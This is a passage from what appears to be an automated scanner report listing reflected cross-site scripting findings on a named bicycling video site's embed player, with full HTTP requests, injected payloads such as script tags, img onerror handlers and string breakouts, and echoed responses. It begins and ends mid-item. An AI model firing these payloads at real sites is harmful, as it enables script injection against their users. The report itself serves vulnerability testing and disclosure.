   body { font: 12px geneva, helvetica, sans-serif; margin: 0px; background-color: #FFFFFF; width: 1075b5829<img src=a onerror=alert(1)>1d66e8cc452px; height: 949px; }
   #magnify_widget_loading_indicator { height: 66px; width: 1075b5829<img src=a onerror=alert(1)>
...[SNIP]...

2.32. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.bicycling.com
Path:   /embed/player/container/1075/949/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caf64'%3be6b49ff826f was submitted in the REST URL parameter 4. This input was echoed as caf64';e6b49ff826f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /embed/player/container/1075caf64'%3be6b49ff826f/949/C5QKZB153SRSPSH2?referrer=NaN HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 85899
Date: Thu, 10 Mar 2011 16:50:24 GMT
X-Varnish: 909021125
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
ponents/';
           var toolRoot = '/embed/player/templates/compact/modules/';
           var isIE = navigator.userAgent.indexOf("MSIE");
           document.body.style.height = '949px';
           document.body.style.width = '1075caf64';e6b49ff826fpx';
           var isSSO = '';
           var widgetCID = 'C5QKZB153SRSPSH2';
           var currentCID = '21CQ460F9BWWZSF9';
           var width = '1075caf64';e6b49ff826f';
           var height = '949';
           var playerWidth = 1059;
           var
...[SNIP]...

2.33. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.bicycling.com
Path:   /embed/player/container/1075/949/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4edad'%3bffee883830f was submitted in the REST URL parameter 5. This input was echoed as 4edad';ffee883830f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /embed/player/container/1075/9494edad'%3bffee883830f/C5QKZB153SRSPSH2?referrer=NaN HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 85898
Date: Thu, 10 Mar 2011 16:50:39 GMT
X-Varnish: 909023253
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
ot = '/embed/player/templates/compact/components/';
           var toolRoot = '/embed/player/templates/compact/modules/';
           var isIE = navigator.userAgent.indexOf("MSIE");
           document.body.style.height = '9494edad';ffee883830fpx';
           document.body.style.width = '1075px';
           var isSSO = '';
           var widgetCID = 'C5QKZB153SRSPSH2';
           var currentCID = '21CQ460F9BWWZSF9';
           var width = '1075';
           var height = '9494edad';ffee883
...[SNIP]...

2.34. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/1075/949/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b5c89<img%20src%3da%20onerror%3dalert(1)>9da1d521d39 was submitted in the REST URL parameter 5. This input was echoed as b5c89<img src=a onerror=alert(1)>9da1d521d39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /embed/player/container/1075/949b5c89<img%20src%3da%20onerror%3dalert(1)>9da1d521d39/C5QKZB153SRSPSH2?referrer=NaN HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 86023
Date: Thu, 10 Mar 2011 16:50:45 GMT
X-Varnish: 909024039
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
<style type="text/css">
   body { font: 12px geneva, helvetica, sans-serif; margin: 0px; background-color: #FFFFFF; width: 1075px; height: 949b5c89<img src=a onerror=alert(1)>9da1d521d39px; }
   #magnify_widget_loading_indicator { height: 66px; width: 1075px; position: absolute; top: 441.5px; text-align: center; }

           /* make sure that the add-this flash object that keeps showing up at
...[SNIP]...

2.35. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/1075/949/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bfa7"><script>alert(1)</script>0e1ff1c94dc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/player/container/1075/949/C5QKZB153SRSPSH26bfa7"><script>alert(1)</script>0e1ff1c94dc?referrer=NaN HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=8d883e03604c96a77a2b7af093324533; path=/; expires=Fri, 11-Mar-2011 16:50:47 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-Cached: No
Content-Length: 48399
Date: Thu, 10 Mar 2011 16:50:47 GMT
X-Varnish: 909024303
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
elp us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH26bfa7"><script>alert(1)</script>0e1ff1c94dc%0AServer: video.bicycling.com%0APath: /embed/player/container/1075/949/C5QKZB153SRSPSH26bfa7">
...[SNIP]...

2.36. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [referrer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/1075/949/C5QKZB153SRSPSH2

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77465'%3balert(1)//f52713f5f05 was submitted in the referrer parameter. This input was echoed as 77465';alert(1)//f52713f5f05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/player/container/1075/949/C5QKZB153SRSPSH2?referrer=NaN77465'%3balert(1)//f52713f5f05 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 85815
Date: Thu, 10 Mar 2011 16:50:09 GMT
X-Varnish: 909018827
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
%3A55&footer_height=0&content_type=content_item&read_more=0";
var this_embed_url = 'http://' + window.location.hostname + '/embed/player/C5QKZB153SRSPSH2;'
var magnifyReferrer = decodeURIComponent('NaN77465';alert(1)//f52713f5f05');

var magnifyViewer = '//w-c/C5QKZB153SRSPSH2';
var registrationRequired = false;


           var playerRoot = '/embed/player/';
           var componentRoot = '/embed/player/templates/compact/components/';
           va
...[SNIP]...

2.37. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/298/275/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bf17"><script>alert(1)</script>6f4cc8b73d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed8bf17"><script>alert(1)</script>6f4cc8b73d4/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=ffebad8e173024e8ec1573a901e31dc8; path=/; expires=Fri, 11-Mar-2011 16:41:01 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48395
Date: Thu, 10 Mar 2011 16:41:01 GMT
X-Varnish: 908938376
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
y=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/embed8bf17"><script>alert(1)</script>6f4cc8b73d4/player/container/298/275/C5QKZB153SRSPSH2%0AServer: video.bicycling.com%0APath: /embed8bf17">
...[SNIP]...

2.38. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/298/275/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82156"><script>alert(1)</script>597d18b9bdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/player82156"><script>alert(1)</script>597d18b9bdb/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=0a36f3dd74372891ac4a354e31f035b9; path=/; expires=Fri, 11-Mar-2011 16:41:06 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48395
Date: Thu, 10 Mar 2011 16:41:06 GMT
X-Varnish: 908939174
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/embed/player82156"><script>alert(1)</script>597d18b9bdb/container/298/275/C5QKZB153SRSPSH2%0AServer: video.bicycling.com%0APath: /embed/player82156">
...[SNIP]...

2.39. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/298/275/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8e90<img%20src%3da%20onerror%3dalert(1)>21366086941 was submitted in the REST URL parameter 4. This input was echoed as a8e90<img src=a onerror=alert(1)>21366086941 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /embed/player/container/298a8e90<img%20src%3da%20onerror%3dalert(1)>21366086941/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 85733
Date: Thu, 10 Mar 2011 16:41:27 GMT
X-Varnish: 908941969
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
<style type="text/css">
   body { font: 12px geneva, helvetica, sans-serif; margin: 0px; background-color: #FFFFFF; width: 298a8e90<img src=a onerror=alert(1)>21366086941px; height: 275px; }
   #magnify_widget_loading_indicator { height: 66px; width: 298a8e90<img src=a onerror=alert(1)>
...[SNIP]...

2.40. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.bicycling.com
Path:   /embed/player/container/298/275/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4cd7'%3bb2cc4d48b59 was submitted in the REST URL parameter 4. This input was echoed as a4cd7';b2cc4d48b59 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /embed/player/container/298a4cd7'%3bb2cc4d48b59/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 85565
Date: Thu, 10 Mar 2011 16:41:20 GMT
X-Varnish: 908941111
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
mponents/';
           var toolRoot = '/embed/player/templates/compact/modules/';
           var isIE = navigator.userAgent.indexOf("MSIE");
           document.body.style.height = '275px';
           document.body.style.width = '298a4cd7';b2cc4d48b59px';
           var isSSO = '';
           var widgetCID = 'C5QKZB153SRSPSH2';
           var currentCID = '21CQ460F9BWWZSF9';
           var width = '298a4cd7';b2cc4d48b59';
           var height = '275';
           var playerWidth = 282;
           var pl
...[SNIP]...

2.41. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.bicycling.com
Path:   /embed/player/container/298/275/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97722'%3b90a6bc74ebe was submitted in the REST URL parameter 5. This input was echoed as 97722';90a6bc74ebe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /embed/player/container/298/27597722'%3b90a6bc74ebe/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 85665
Date: Thu, 10 Mar 2011 16:41:39 GMT
X-Varnish: 908943914
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
ot = '/embed/player/templates/compact/components/';
           var toolRoot = '/embed/player/templates/compact/modules/';
           var isIE = navigator.userAgent.indexOf("MSIE");
           document.body.style.height = '27597722';90a6bc74ebepx';
           document.body.style.width = '298px';
           var isSSO = '';
           var widgetCID = 'C5QKZB153SRSPSH2';
           var currentCID = '21CQ460F9BWWZSF9';
           var width = '298';
           var height = '27597722';90a6bc74e
...[SNIP]...

2.42. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/298/275/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b8aeb<img%20src%3da%20onerror%3dalert(1)>474e73dc4fd was submitted in the REST URL parameter 5. This input was echoed as b8aeb<img src=a onerror=alert(1)>474e73dc4fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /embed/player/container/298/275b8aeb<img%20src%3da%20onerror%3dalert(1)>474e73dc4fd/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 85689
Date: Thu, 10 Mar 2011 16:41:45 GMT
X-Varnish: 908944847
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
<style type="text/css">
   body { font: 12px geneva, helvetica, sans-serif; margin: 0px; background-color: #FFFFFF; width: 298px; height: 275b8aeb<img src=a onerror=alert(1)>474e73dc4fdpx; }
   #magnify_widget_loading_indicator { height: 66px; width: 298px; position: absolute; top: 104.5px; text-align: center; }

           /* make sure that the add-this flash object that keeps showing up at t
...[SNIP]...

2.43. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/298/275/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5d7b"><script>alert(1)</script>9abb6c75940 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/player/container/298/275/C5QKZB153SRSPSH2a5d7b"><script>alert(1)</script>9abb6c75940?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
